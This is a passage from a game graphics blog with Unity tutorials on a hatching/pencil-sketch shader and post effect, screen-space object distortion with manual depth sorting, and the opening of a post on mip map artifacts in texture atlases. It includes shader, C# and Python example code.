Second, you may have realized that the above all relies on a very big assumption: that our intensity will never exceed 1.0. Of course this is nonsense, but assuming it up until now has both made our math easier, and given us a fun hack to let us go to pure white when being lit very brightly. At the beginning of our math, we just need to store max(0, intensity - 1.0), and add it back at the end. For values less than 1.0, this is going to be zero and for anything super bright, it’s going to push us into pure white territory.

Altogether, the hatching function looks like this:

fixed3 Hatching(float2 _uv, half _intensity)
{
    half3 hatch0 = tex2D(_Hatch0, _uv).rgb;
    half3 hatch1 = tex2D(_Hatch1, _uv).rgb;

    half3 overbright = max(0, _intensity - 1.0);

    half3 weightsA = saturate((_intensity * 6.0) + half3(-0, -1, -2));
    half3 weightsB = saturate((_intensity * 6.0) + half3(-3, -4, -5));

    weightsA.xy -= weightsA.yz;
    weightsA.z -= weightsB.x;
    weightsB.xy -= weightsB.yz;

    hatch0 = hatch0 * weightsA;
    hatch1 = hatch1 * weightsB;

    half3 hatching = overbright + hatch0.r +
        hatch0.g + hatch0.b +
        hatch1.r + hatch1.g +
        hatch1.b;

    return hatching;
}
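To poke at how this function behaves at the extremes (pure black, the brightest map, and the overbright hack), here's a scalar Python sketch of the same logic. Instead of sampling textures it takes six made-up hatch values for a single pixel, in hatch0.rgb then hatch1.rgb order, so treat it as a way to check the arithmetic rather than a port of the shader.

```python
def saturate(x):
    """Clamp x to the 0-1 range, like the shader intrinsic."""
    return max(0.0, min(1.0, x))


def hatching(intensity, samples):
    """Scalar version of the Hatching function for one pixel.

    samples: six hatch values in hatch0.rgb + hatch1.rgb order.
    """
    overbright = max(0.0, intensity - 1.0)

    i = intensity * 6.0
    w = [saturate(i - k) for k in range(6)]
    weights = [w[k] - w[k + 1] for k in range(5)] + [w[5]]

    return overbright + sum(s * wt for s, wt in zip(samples, weights))


samples = [0.1, 0.2, 0.4, 0.6, 0.8, 0.9]  # hypothetical values for one pixel

print(hatching(0.0, samples))   # no light at all: fully black
print(hatching(1.0, samples))   # only the last (brightest) channel contributes
print(hatching(1.5, samples))   # overbright pushes the result past 1.0
```

Anything above 1.0 shows up as pure white once it's written to a regular colour buffer, which is the whole point of the overbright term.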

If we plug that into our pixel shader like so:

fixed4 frag (v2f i) : SV_Target
{
    fixed4 color = tex2D(_MainTex, i.uv);
    half3 diffuse = color.rgb * _LightColor0.rgb * dot(_WorldSpaceLightPos0, normalize(i.nrm));

    half intensity = dot(diffuse, half3(0.2126, 0.7152, 0.0722));

    color.rgb =  Hatching(i.uv * 8, intensity);

    return color;
}

We end up with a lovely hatch material:

Last thing to note here is that I’m multiplying the input UVs by 8 when I pass them to the hatch function. This is purely a hack because I think it looks better with the hatch textures I’m using. YMMV, especially if you’re generating your own TAM.

A Post Processing Effect

So now that we have the basic effect, it’s time to do something more exciting with it. Moving this to a post effect makes it much easier to use in a project, and do fun things like integrate with other effects, like a vignette:

But for now, I’m just going to walk through turning this into a plain old full screen sketch effect:

This is surprisingly straightforward. We’re already rendering the entire scene with lighting in our main pass, which means that we can pull our intensity value from there. This has the advantage of letting us sketchify scenes using complicated materials or Unity’s dynamic GI without us having to think about anything. Other than that, about the only thing we need is the UVs of the objects we’re shading.

But as is usually the case with graphics, we need to do a bit of setup first:

[RequireComponent(typeof(Camera))]
public class PencilSketchPostEffect : MonoBehaviour
{
public float bufferScale = 1.0f;
public Shader uvReplacementShader;
public Material compositeMat;

private Camera mainCam;
private int scaledWidth;
private int scaledHeight;
private Camera effectCamera;

void Start ()
{
    Application.targetFrameRate = 120;
    mainCam = GetComponent<Camera>();

    effectCamera = new GameObject().AddComponent<Camera>();
}

void Update()
{
    bufferScale = Mathf.Clamp(bufferScale, 0.0f, 1.0f);
    scaledWidth = (int)(Screen.width * bufferScale);
    scaledHeight = (int)(Screen.height * bufferScale);
}

If you’re familiar with my previous posts, this should look very familiar. All we’re doing is setting up our effect to use a second camera, and updating some variables to scale any buffers we need to create. Simple stuff. The fun starts inside OnRenderImage:

private void OnRenderImage(RenderTexture src, RenderTexture dst)
{
    effectCamera.CopyFrom(mainCam);
    effectCamera.transform.position = transform.position;
    effectCamera.transform.rotation = transform.rotation;

    //render scene into a UV buffer
    RenderTexture uvBuffer = RenderTexture.GetTemporary(scaledWidth, scaledHeight, 24, RenderTextureFormat.ARGBFloat);
    effectCamera.SetTargetBuffers(uvBuffer.colorBuffer, uvBuffer.depthBuffer);
    effectCamera.RenderWithShader(uvReplacementShader, "");

    compositeMat.SetTexture("_UVBuffer", uvBuffer);

    //Composite pass with packed TAMs
    Graphics.Blit(src, dst, compositeMat);

    RenderTexture.ReleaseTemporary(uvBuffer);
}

Again, mostly, this is all the same as previous effects. We copy the settings we need from the main camera to the effect camera, create our temporary buffer to render UVs into, and then render the scene UVs.

Once we have our UV buffer populated, we pass it to our composite shader, which does the rest of the work.

It’s very easy to make a mistake when rendering the UV buffer. With UVs, we need much more precision than we can store in a default RT texel. Remember earlier when I was talking about needing to store the luminosity constant in a half3 because a fixed3 didn’t have enough precision? That goes double for UVs. If you forget about this and try to output your UVs to a regular buffer, you end up with a mess:

Wrong Precision Left, Correct Precision Right
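To put a number on how bad the wrong precision is, here's a Python sketch that pretends an object's U coordinate runs from 0 to 1 across 1024 pixels, stores it in either an 8-bit channel or a 32-bit float, and counts how many distinct values survive. The 1024 pixel width and the helper names are assumptions for the example.

```python
import struct


def store_unorm8(value):
    """Store a 0-1 value in an 8-bit channel and read it back."""
    return round(value * 255) / 255


def store_float32(value):
    """Store a value in a 32-bit float channel and read it back."""
    return struct.unpack('<f', struct.pack('<f', value))[0]


def distinct_values(store, pixels=1024):
    """Count distinct U values left after storing a 0-1 ramp across `pixels`."""
    return len({store(x / (pixels - 1)) for x in range(pixels)})


print(distinct_values(store_unorm8))   # 256
print(distinct_values(store_float32))  # 1024
```

With only 256 possible values, neighbouring pixels end up sharing the same UV, and once that UV is multiplied up to tile the hatch texture those steps turn into visible blocks.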

Since we’re going to use a floating point buffer, that means that our fragment shader needs to return a float4, so our UV replacement shader looks like this:

float4 frag (v2f i) : SV_Target
{
    float2 uv = i.uv;

    return float4(i.uv.x, i.uv.y, _MainTex_ST.x, _MainTex_ST.y);
}

I’m also taking the time here to output the tiling info from the main texture (_MainTex_ST.xy) so that we can use it later to (hopefully) get a more accurate effect.

Finally, the composite shader is very simple, now that you know what the hatching function is:

fixed4 frag (v2f i) : SV_Target
{
    fixed4 col = tex2D(_MainTex, i.uv);

    float4 uv = tex2D(_UVBuffer, i.uvFlipY);

    half intensity = dot(col.rgb, float3(0.2126, 0.7152, 0.0722));

    half3 hatch =  Hatching(uv.xy * 8, intensity);

    col.rgb = hatch;

    return col;
}

Speaking of precision though, you’ll notice that using the above code, the hack we used earlier to have very bright objects go to white no longer works. This is again because of buffer precision: the buffer that our main camera is rendering to only stores values up to 1.0, so that extra information is getting clipped before it gets to us. You can certainly make it happen - you’ll need the main camera rendering into a high precision buffer, and you’ll need the shaders on individual elements to output halfs or floats - but this violates our principle of not requiring changes to the shaders objects are using, therefore I’m calling it outside the scope of this post.

Performance

On an iPhone 6, rendering the scene you see in the gif at the beginning of the post with a hatching shader on each robot was blazing fast (almost exactly the speed that rendering them with a diffuse shader was). However, turning on the post effect added 4 ms to the render time. This is likely due to the fact that we’re performing 4 texture lookups (main cam, uv buffer, 2 hatch textures) and a not insignificant amount of math inside the composite shader (which operates at full res).

I didn’t do any performance testing on desktop, mostly because after working in mobile for half a decade, it’s just easier for me to grab the numbers off of a phone. My gut says that anything a phone can do in 4 ms, my laptops can do in basically no time, but I’m basing that on basically nothing but a hunch.

Conclusion

Firstly, all the code that I talked about is available on github. It’s GPL’ed because to the best of my knowledge, the hatch images I found were released under the GPL.

There are lots of potential issues you’ll run into with this effect if you use it in a real project. For example, handling non uniform object scale can present some odd issues, especially if you don’t want to break static batching by passing scale to the object’s material. I think you could get around this by encoding the scale of objects into their vertex color, but if you know the scale of your object at bake time, you should probably just resize your mesh.

In reality though, the effect as presented here is likely not going to make your art team very happy. I think you’d likely run into artists wanting to author custom TAMs with different types of strokes, and maps for each object to control which type of stroke was used where.

That about wraps things up, this was a lot of fun! If you have any questions, shoot me a message on twitter, I’d love to see more projects using this type of effect, so send me screenshots of anything you build with it!

[Update: 5/18/2020: Thanks to @__seb for pointing out a typo in the hatching shader]

Distorting Object Shapes in Screen Space

2017-02-06T00:00:00+00:00

Today I’m going to walk through a different take on the distortion effect that I presented a while ago in the post “Screen Space Distortion and a Sci-fi Shield Effect.” This time, instead of using distortion to see “through” an object, we are going to distort the shape of objects themselves. When it’s all done, it’s going to look something like this:

Pretty snazzy right? The tricky part of the effect isn’t the distortion, it’s in getting the edges of the distorted objects to sort “correctly”. Or…as correctly as the edge of an object distorted in screen space can.

All of this was done using Unity 5.5.x, so if you’ve arrived here from the future and are using a different version, you may have to tweak what I present here.

A High Level View of the Effect

Before we dive into the implementation details, here’s a quick outline of what we’re going to do to make this effect work:

Render all the non distorting objects into our main RenderTexture
Blit the RGB channels of that buffer into a lower res RT
Render the distorting objects (undistorted) into the lower res RT using a custom shader
Combine all of these buffers together to make the effect

Sounds fun right? Let’s get started.

Some Initial Set Up

The entire c# part of the effect is going to live on a single script that we’ll attach to the main camera, which we’ll get set up here.

I implemented this with two cameras, mostly so that I didn’t have to touch culling masks / settings on the main scene camera, which we use to get the color buffer that doesn’t have distorted objects in it. The second camera, which the script creates, is the one we use to render the distorting objects.

private Camera cam;
private Camera maskCam;

public Material compositeMat;
public Material stripAlphaMat;

public float speed = 1.0f;
public float scaleFactor = 1.0f;
public float magnitude = 0.01f;

private int scaledWidth;
private int scaledHeight;
void Start ()
{

    cam                     = GetComponent<Camera>();
    scaledWidth             = (int)(Screen.width * scaleFactor);
    scaledHeight            = (int)(Screen.height * scaleFactor);

    cam.cullingMask         = ~(1 << LayerMask.NameToLayer("Distortion"));
    cam.depthTextureMode    = DepthTextureMode.Depth;

    maskCam                 = new GameObject("Distort Mask Cam").AddComponent<Camera>();
    maskCam.enabled         = false;
    maskCam.clearFlags      = CameraClearFlags.Nothing;
}

There are a few things to note here: First, we need to determine how big we want our distorted color buffer to be, so I’m multiplying the screen size by a float. This is important for optimizing the effect for low power devices. The smaller our second buffer is, the faster the effect will be, and the less memory it will use.

The other important thing to note is that I’m setting the depthTextureMode on the main camera. This is so that the camera will output a depth texture that we can see in our shaders, which we’re going to use to help us sort our distorting object later on.
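Going back to the buffer size for a second: the savings from scaling are bigger than they might look, because the scale applies to both width and height. This Python sketch estimates the colour memory of the second buffer at a given scale. The 1920x1080 screen is a made-up example, the clamp matches the one in the Update function below, and the estimate ignores the depth buffer and any padding the GPU adds.

```python
ARGB32 = 4       # bytes per pixel, 8 bits per channel
ARGB_FLOAT = 16  # bytes per pixel, 32 bits per channel


def rt_color_bytes(screen_w, screen_h, scale, bytes_per_pixel):
    """Rough colour buffer size for a render texture at the given scale."""
    scale = max(0.01, min(1.0, scale))
    width = int(screen_w * scale)
    height = int(screen_h * scale)
    return width * height * bytes_per_pixel


full = rt_color_bytes(1920, 1080, 1.0, ARGB_FLOAT)
half = rt_color_bytes(1920, 1080, 0.5, ARGB_FLOAT)
print(full, half, full / half)
```

Halving the scale factor cuts the buffer to a quarter of the size, and a quarter of the pixels to fill.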

The other boring bit I want to get out of the way is the update function:

void Update ()
{
   scaleFactor = Mathf.Clamp(scaleFactor, 0.01f, 1.0f);
   scaledWidth = (int)(Screen.width * scaleFactor);
   scaledHeight = (int)(Screen.height * scaleFactor);

   magnitude = Mathf.Max(0.0f, magnitude);
   Shader.SetGlobalFloat("_DistortionOffset", -Time.time * speed);
   Shader.SetGlobalFloat("_DistortionAmount", magnitude/100.0f);
}

Nothing really special here, we’re updating a bunch of values per frame so we can do things like change the scaling value at runtime, and we need to set a few shader parameters in order to update the distortion effect.

The rest of the logic for the effect is going to take place inside OnRenderImage:

private void OnRenderImage(RenderTexture src, RenderTexture dst)
{
//cool stuff goes here :)
}

If you attach this to your main camera and hit play right now, you’ll see a lovely abyss of black fill your screen. Stare into it for a moment before continuing below.

Rendering the DistortionRT

As mentioned above, the first thing we need to do in our OnRenderImage function is to get our RenderTextures filled with some colour (and depth!). Since we’re working in OnRenderImage, we already have the main camera’s output in RT form (the src argument in the function signature), but we need to get our low res colour buffer built up.

In the interest of simplicity, I'm going to refer to our low res RenderTexture as the "distortingRT," because we are going to render the things we want to distort into it.

Before we render our distorting objects however, we need to copy the contents of main RT’s RGB channels into the distortingRT. This will help eliminate ugly artifacts around the edges of our wobbly GameObjects which get caused because we’re using a lower resolution image to grab their colours from. This artifact ends up looking like this:

We also need to output a specific constant into the alpha channel of the distortingRT. We are going to be using the alpha channel as a low resolution depth buffer to let us sort our distorting objects with the ones seen by the main camera, but before we do that, we need a clean slate to work with, so we need to fill the alpha channel of distortingRT with a value that represents the farthest depth possible (the far clip plane).

This is simple, but only if you’re aware of how different platforms handle depth. On some platforms (DX11/12 and Metal for example), the depth buffer goes from 1 to 0, with 1 (or white) being the closest objects, and 0 being the edge of the far plane. Other platforms (like OpenGL) go from 0 to 1. We need our shader to output the farthest depth value possible for anywhere that doesn’t contain a distorting object, so we need to output different values per platform.

Luckily, Unity has a handy preprocessor define to let us know which platform we’re using:

fixed4 frag (v2f i) : SV_Target
{
    fixed4 col = tex2D(_MainTex, i.uv);

#if UNITY_REVERSED_Z
    col.a = 0.0;
#else
    col.a = 1.0;
#endif
    return col;
}

If you aren’t familiar enough with image effect shaders to use the above snippet, the entire source for this article can be found here, but as the rest is mostly boilerplate, I’m not going to include it here.

With our shader built, we can use that to copy what we need from one buffer to the other:

private void OnRenderImage(RenderTexture src, RenderTexture dst)
{
    RenderTexture distortingRT = RenderTexture.GetTemporary(scaledWidth, scaledHeight, 24);
    Graphics.Blit(src, distortingRT, stripAlphaMat);
}

You’ll notice that instead of allocating the distortingRT earlier, we’re grabbing it here using RenderTexture.GetTemporary. The Unity docs have this to say:

If you are doing a series of post-processing “blits”, it’s best for performance to get and release a temporary render texture for each blit, instead of getting one or two render textures upfront and reusing them.

So that’s what we’ll do! We just have to remember to release the texture at the end of the function, otherwise we’re going to allocate a lot of RTs very quickly.

Rendering the Distorting Objects

Next we need to render the things we want to distort into the distortingRT. There’s not really much special about doing this, except that I make sure to re-set up my camera parameters every frame so that other scripts can’t accidentally mess up our rendering.

private void OnRenderImage(RenderTexture src, RenderTexture dst)
{
    RenderTexture distortingRT = RenderTexture.GetTemporary(scaledWidth, scaledHeight, 24, RenderTextureFormat.ARGBFloat);
    Graphics.Blit(src, distortingRT, stripAlphaMat);

    maskCam.CopyFrom(cam);

    maskCam.clearFlags = CameraClearFlags.Depth;
    maskCam.gameObject.transform.position = transform.position;
    maskCam.gameObject.transform.rotation = transform.rotation;
    maskCam.cullingMask = 1 << LayerMask.NameToLayer("Distortion");
    maskCam.SetTargetBuffers(distortingRT.colorBuffer, distortingRT.depthBuffer);

    maskCam.Render();
}

If you aren’t on a platform that gives you access to floating point textures, you can actually use a RenderTextureFormat.Default here, but since you’ll have so little precision in your alpha channel, distorting objects won’t sort correctly as they get farther away from the camera. For relatively small scenes (like a single room) this likely won’t be noticeable, but you’ll start to see more artifacts as your environment gets larger.
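Here's a rough Python sketch of why distance makes the 8-bit version fall apart. It assumes a conventional (non-reversed) D3D-style depth value that runs from 0 at the near plane to 1 at the far plane, and some hypothetical clip planes; the exact numbers will differ in your project, but the shape of the problem is the same.

```python
def depth01(z, near, far):
    """Conventional D3D-style depth: 0 at the near plane, 1 at the far plane."""
    return far / (far - near) * (1.0 - near / z)


def store_unorm8(value):
    """The integer an 8-bit alpha channel would end up holding."""
    return round(value * 255)


near, far = 0.3, 1000.0  # hypothetical clip planes

for a, b in ((2.0, 3.0), (50.0, 60.0)):
    stored_a = store_unorm8(depth01(a, near, far))
    stored_b = store_unorm8(depth01(b, near, far))
    print(a, b, stored_a, stored_b)
```

Two objects a unit apart near the camera get different alpha values, but two objects ten units apart in the distance end up with the same one, so there's nothing left to sort them by.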

If you take a peek at your distortingRT in the inspector, you should see your distorting objects being rendered on top of a copy of what the main camera sees. In the image below, the robots are actually located behind the other geometry in world space, but they are rendered in front of it for the purposes of the distortion buffer.

This is expected and important. If we let our distorting objects sort now, then when an object is partly occluded, we won’t have all the colour information we need to distort the object behind the occluder, leading to artifacts along the edges of occluding objects. So to address this, we’re going to let our objects render on top of everything now, and manually do the depth sorting later. It’s fun! And speaking of rendering our distorting objects, I think now is as good a time as any to talk about what needs to be in the shaders that the distorting objects use.

The Distorting Object Shader

For the most part, this effect can work with any shader you want, provided you can make a small modification to the alpha output. For opaque shaders this is likely not an issue, since they don’t use the alpha channel for anything. Since transparent shaders use their alpha for blending, they’ll need a second pass to write the alpha.

As mentioned earlier, we’re going to use the alpha channel of distortingRT as a depth buffer, so that we can read it in our composite shader to do the depth sorting I was just talking about. That means our distorting materials need to output their depth into the alpha channel. Again, this isn’t a terribly complicated thing to do, but we need to be aware of platform specific differences in handling depth and clip space.

First though, we need to get the data we need from our vertex shader to the fragment shader. This isn’t too difficult, since all we need are the z and w components of your transformed position vector (assuming you’re transforming it by the MVP, like so):

o.pos = mul(UNITY_MATRIX_MVP, v.vertex);

The Z component of this vector is what I think about when I think of depth: it represents the distance from the camera. Unfortunately this value can be well outside the 0 to 1 range that we need to be able to encode it into an alpha channel. To fix that, we can divide by the W component of the position vector, which will get us depth represented in relation to the view frustum. In DirectX, this is going to get us a value between 0 and 1, with 1 being the far clip, and 0 being the near clip. In OpenGL, which uses a different sort of projection matrix, we’re going to end up with a value between -1 and 1. So we need to do some quick math to make sure we don’t try to put a negative value into our texture:

float4 frag (v2f i) : SV_Target
{
//other shading logic fills RGB channels

col.a = (i.screen.z / i.screen.w);

//using UNITY_REVERSED_Z because SHADER_TARGET_GLSL
//doesn't seem to work on my machine
#if !defined(UNITY_REVERSED_Z)
    col.a = (col.a + 1.0) * 0.5;
#endif
    return col;
}
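If the remapping is easier to follow outside of a shader, here's a rough standalone Python sketch of the same arithmetic (not Unity code). The function name and the `ndc_is_minus_one_to_one` flag are made up for illustration; the flag stands in for the platform check in the shader above.

```python
def depth_to_alpha(clip_z, clip_w, ndc_is_minus_one_to_one):
    """Turn clip-space z and w into a value that fits in a 0..1 alpha channel."""
    # The perspective divide gives depth relative to the view frustum.
    ndc_depth = clip_z / clip_w
    if ndc_is_minus_one_to_one:
        # GL-style range: shift and scale -1..1 into 0..1.
        ndc_depth = (ndc_depth + 1.0) * 0.5
    return ndc_depth
```

A point on the GL-style near plane (z / w of -1) ends up as 0, and a point on the far plane ends up as 1, so nothing negative ever gets written to the texture.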

With that modification to your shaders, if you render only the alpha channel of your distortingRT, it should look something like this:

The Composite Shader

Now all that’s left is to put this all together. The composite shader is going to be the most complicated shader we’ve talked about so far, so I’m going to provide more of the code than I have been. To start with, let’s look at the data we are going to pass the shader:

sampler2D _MainTex;
float4 _MainTex_ST;

sampler2D _DistortionRT;
sampler2D _CameraDepthTexture;

float _DistortionOffset;
float _DistortionAmount;

_MainTex is going to be the regular old colour buffer that the main camera sees, nothing special there. _DistortionRT is the buffer that we’ve been building up until now, with the RGB of our distorting objects, and their depths stored in the alpha channel.

_CameraDepthTexture is going to be the depth texture created by the main camera. This is a globally accessible resource that Unity will make for us, since we specified a depth texture mode for the main camera at the beginning of this post.

Finally, the two floating point values are to control the distortion effect. _DistortionOffset controls how fast the distortion effect moves, and as we saw earlier, is passed in as Time.time multiplied by a constant. The higher we set the constant value, the faster the distortion wiggles. _DistortionAmount is also passed in from our effect script, and controls how wide we want the distortion effect to be. Changing this value determines whether we have a subtle wobble or a spastic glitch effect.

Got it? Good! I’m going to skip talking about the vertex shader because it’s just a passthrough:

v2f vert(appdata v)
{
	v2f o;
	o.vertex = mul(UNITY_MATRIX_MVP, v.vertex);
	o.uv = TRANSFORM_TEX(v.uv,_MainTex);
	return o;
}

So let’s jump directly to the good part, the fragment shader. First let’s get the values we need from the _MainTex and the _CameraDepthTexture:

fixed4 frag(v2f i) : SV_Target
{
    fixed4 screen = tex2D(_MainTex, float2(i.uv.x, i.uv.y));

    float2 distortUVs = i.uv;

#if defined(UNITY_UV_STARTS_AT_TOP) && !defined(SHADER_API_MOBILE)
	distortUVs.y = 1.0 - distortUVs.y;
#endif

    float d = tex2D(_CameraDepthTexture, distortUVs).r;

I wish I had a better explanation for the #ifdef section, but I don’t. Sometimes Unity accounts for the UV flip between platforms and sometimes it doesn’t. As far as I could tell, _MainTex is always right side up, and this set of defines will get us the correctly oriented UVs on whatever platform we’re using (I tested with GL, D3D11 and on an iPhone using Metal).

Other than that bit of engine specific weirdness, this should be pretty easy to follow so far. So let’s make it more complicated and grab our _DistortionRT value.

float4 distort = tex2D(_DistortionRT, fixed2(distortUVs.x + sin((distortUVs.y + _DistortionOffset) * 100)*_DistortionAmount, distortUVs.y));

This is likely confusing. All the crazy UV math is because we want to apply the distortion effect here. So we use this math to grab the colour at the position that the distortion effect needs us to read from. I went over this in much more detail in my previous post so I’m not going to talk much more about this here. For today’s purposes, here’s what you need to keep in mind:

Using this UV math will distort the entire _DistortionRT buffer, so if we just returned this color, the entire screen would be distorted.
The alpha channel still contains depth
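To make the UV math a little less mysterious, here's the horizontal offset on its own as a small standalone Python sketch (not shader code). The function name is hypothetical; the parameters mirror the shader's `_DistortionOffset` and `_DistortionAmount`.

```python
import math

def distorted_u(u, v, distortion_offset, distortion_amount):
    """Horizontal UV after the sine wobble; v is left untouched by the effect."""
    # The wave's phase depends on the row (v) and on the animated offset.
    wobble = math.sin((v + distortion_offset) * 100.0)
    # sin() stays in -1..1, so u never moves by more than distortion_amount.
    return u + wobble * distortion_amount
```

Because the sine is bounded, `_DistortionAmount` is effectively the maximum sideways shift in UV space, which is why it controls how wide the wobble looks.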

Now that we have these values, we need to finally depth sort our distorting objects. Luckily, we now have 2 depth values, so all we need to do is compare them. In cases where the depth from _DistortionRT is closer to the camera, we want to return the RGB from _DistortionRT, and otherwise, we want to return the regular old _MainTex. Pretty easy right?

#if UNITY_REVERSED_Z
	return lerp(screen, distort, distort.a > d);
#else
	return lerp(screen, distort, distort.a < d);
#endif

Remember that different platforms handle depth differently, so depending on which platform you’re on, your comparison will need to flip, as shown above.
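Stripped of shader syntax, the per-pixel decision looks something like this standalone Python sketch. The function and parameter names are invented for illustration, and `reversed_z` plays the role of the `UNITY_REVERSED_Z` define.

```python
def composite_pixel(screen_rgb, distort_rgb, distort_depth, scene_depth, reversed_z):
    """Pick the distorted colour only where the distorting object is in front."""
    if reversed_z:
        # Reversed depth: larger values are closer to the camera.
        distort_is_closer = distort_depth > scene_depth
    else:
        # Conventional depth: smaller values are closer to the camera.
        distort_is_closer = distort_depth < scene_depth
    return distort_rgb if distort_is_closer else screen_rgb
```

The shader version gets the same result without branching by feeding the comparison into `lerp` as a 0 or 1 blend factor.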

The entire source for the composite fragment function is as follows:

fixed4 frag(v2f i) : SV_Target
{
    fixed4 screen = tex2D(_MainTex, float2(i.uv.x, i.uv.y));

    float2 distortUVs = i.uv;

#if defined(UNITY_UV_STARTS_AT_TOP) && !defined(SHADER_API_MOBILE)
    distortUVs.y = 1.0 - distortUVs.y;
#endif

    float4 distort = tex2D(_DistortionRT, fixed2(distortUVs.x + sin((distortUVs.y + _DistortionOffset) * 100)*_DistortionAmount, distortUVs.y));
    float d = tex2D(_CameraDepthTexture, distortUVs).r;

#if UNITY_REVERSED_Z
    return lerp(screen, distort, distort.a > d);
#else
    return lerp(screen, distort, distort.a < d);
#endif
}

All we need to do now is add the final blit to the effect script, which makes the completed OnRenderImage function look like so:

private void OnRenderImage(RenderTexture src, RenderTexture dst)
{
   RenderTexture distortingRT = RenderTexture.GetTemporary(scaledWidth, scaledHeight, 24, RenderTextureFormat.ARGBFloat);
   Graphics.Blit(src, distortingRT, stripAlphaMat);

   maskCam.CopyFrom(cam);
   maskCam.gameObject.transform.position = transform.position;
   maskCam.gameObject.transform.rotation = transform.rotation;

   //draw the distorting objects into the buffer
   maskCam.clearFlags = CameraClearFlags.Depth;
   maskCam.cullingMask = 1 << LayerMask.NameToLayer("Distortion");
   maskCam.SetTargetBuffers(distortingRT.colorBuffer, distortingRT.depthBuffer);
   maskCam.Render();

   //Composite pass
   compositeMat.SetTexture("_DistortionRT", distortingRT);
   Graphics.Blit(src, dst, compositeMat);

   RenderTexture.ReleaseTemporary(distortingRT);

}

Performance Thoughts, Other Considerations

So now we should have a working effect! If you’re lost with implementing any part of this, or were just too lazy to do it yourself, all the code for the effect is available on github here.

All that’s left to do is talk about some left over details that didn’t fit anywhere else, and performance. Luckily the performance talk is short - this is a pretty lightweight effect. With a scale factor of 0.5 (so the distortion buffer is half the resolution of the main camera’s), my iPhone eats this for breakfast. This will of course become more expensive the bigger your distortion buffer is, but on such a small screen you can probably get away with a half res buffer.

And if my phone can run this… I think it goes without saying that both my laptops barely noticed this effect. I don’t have numbers because everything ran this at 60 fps and I really didn’t care to spend my weekend trying to get any more granular than that.

The other thing to mention is what could be done to make this effect better! The sine wave distortion is fairly cheesy, but you could likely extend this to handle more interesting distortion patterns if you took a few concepts from my other post on screen space distortion.

Also, since this is all in screen space, objects that are farther away from the camera appear to be distorting at a higher magnitude than objects closer to your camera. You could probably account for this by scaling the distortion magnitude based on the distorting object’s depth, but I haven’t tried this out yet.

That’s all for now, shoot me a message on Twitter if you have any questions or are doing something with this effect :)

Minimizing Mip Map Artifacts In Atlassed Textures

2016-11-04T00:00:00+00:00

Since all my professional work is on mobile games, I spend a LOT of time working on tools and systems that can squeeze as much performance out of low powered hardware as possible. Perhaps unsurprisingly, one of these tools is texture atlassing, that is, packing multiple textures into a larger image, which ends up looking something like this:

That Texture Atlassing is a good idea isn’t really news. I’m not here to sell you on the benefits of doing it (although if I was, I’d mention things like fewer texture state changes, improved batching, lower memory usage, and the ability to use NPOT textures on ES2 hardware), what I am here to do is to walk through how to build a good one.

There are a lot of tutorials and texture atlassing options out there already, but they all seem targeted at people making 2D games or using them for UI. While these are perfectly good use cases, they often ignore one of the harder problems when you’re working with Texture Atlasses: mip mapping. If you’ve ever atlassed a 3D scene (which is a very VERY good idea on mobile), you’ve probably noticed some ugly texture seams when your camera pulls back:

(I didn't use the atlas in the first picture to make this one)

This is what it looks like when your texture atlasser isn’t built to handle mip mapping. Notice how in the distance, there starts to be weird colours (from an adjacent sprite in my atlas) polluting the appearance of our texture. Again, not applicable to UI or 2D things, but very applicable to what I do (3D), so today I thought I’d go over how to write a texture atlasser that does solve these problems.

Brief Aside: What is Mip Mapping

Mip Mapping is a rendering technique which creates lower resolution versions of a texture, and swaps to these lower resolution textures based on how far away an object is from the camera. This is done both to increase rendering speed, and to improve rendering quality. Without mip mapping, as textures get farther away, they tend to start “shimmering”, which looks really unnatural. With mip mapping, the renderer switches to a lower resolution (and essentially pre antialiased) version of the texture, which eliminates this shimmer:

If you’re using Unity, you’ve almost certainly been using mip maps the whole time without knowing it (although you may have wondered why the size of your images in memory was larger than you thought), and in most cases you never have to think about mip mapping at all. With texture atlassing, you do, and this is because mip maps are usually generated by taking the original image, and shrinking it by halving both dimensions of the texture. This is done multiple times, so a 512x512 texture will have mips with a width and height of 256, 128, 64, 32, etc. This shrinking is done most often using a simple Bilinear Filter, which essentially averages a bunch of pixels in the high resolution image to determine what colour a pixel is in a lower resolution version.

In most cases, this is great, but in a texture atlas, this can lead to the edges of individual textures getting mixed with neighboring textures when the mips are generated. In extreme cases (like pictured above), the edges of a really bright texture can pick up dark colours and look very different from what’s intended. There are lots of ways to mitigate this in a texture atlasser, but I’ve yet to find a texture atlasser out there that does any of them by default, so today we’re going to build one that does.
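Here's a tiny standalone Python sketch of why that averaging causes trouble. It assumes a simplified one-dimensional "atlas" and a plain two-pixel average, which is a stand-in for whatever filter your engine actually uses, and both function names are made up.

```python
def mip_chain_sizes(size):
    """Widths of the successive mips of a square texture, down to 1 pixel."""
    sizes = []
    while size > 1:
        size //= 2
        sizes.append(size)
    return sizes

def downsample_row(row):
    """Build the next mip of a 1D row by averaging each pair of neighbours."""
    return [(row[i] + row[i + 1]) / 2.0 for i in range(0, len(row) - 1, 2)]

# A 3 pixel wide white texture packed right next to a 5 pixel wide black one.
atlas_row = [1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0]
first_mip = downsample_row(atlas_row)  # the second texel is a blend of both textures
```

In `first_mip`, the texel that straddles the boundary comes out grey, even though neither source texture contains any grey. That blended texel is the seam you see when the camera pulls back.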

How A Texture Atlasser Works

At a high level, a texture atlasser consists of two parts, which I’ve assigned super unofficial names:

A Texture Packer, which determines where to put each texture in the atlas
A Blitter, which uses the UV rectangles generated by the Texture Packer to draw textures into the output atlas texture.

The Texture Packer is a pretty universal component. We’re going to walk through building one for completeness’ sake, but the real meat here is what we do in the Blitter to help our mip maps.

How to Build a Texture Packer

Since it’s the first step in the process, let’s tackle the packer first. I’m going to write all the code in Unity because then I can piggy back on all their systems and keep the amount of code in this article manageable, but the core concepts are applicable anywhere. It’s worth noting that there isn’t really anything special about this texture packing implementation, we’ll get to the real meat of what I want to talk about in the Blitter section.

The Output Struct

Speaking of core concepts, let’s talk about what our Texture Packer is going to output.

public struct AtlasLayout
{
    //public so that the Blitter can read the atlas size later
    public int width;
    public int height;
    public List<Texture2D> textures;
    public List<Rect> rects;

    public AtlasLayout(int w, int h)
    {
    	width = w;
    	height = h;
    	textures = new List<Texture2D>();
    	rects = new List<Rect>();
    }
};

The reason we need to output all this data is to handle cases where we want to return a list of AtlasLayouts instead of a single one, which we might want to do if we have a lot of textures to atlas, but our hardware limits us to a max of 2048x2048 textures (like some mobile phones). In the interest of brevity, I’m not going to handle multiple atlasses in this article, but I still feel like having a defined output struct makes things cleaner.

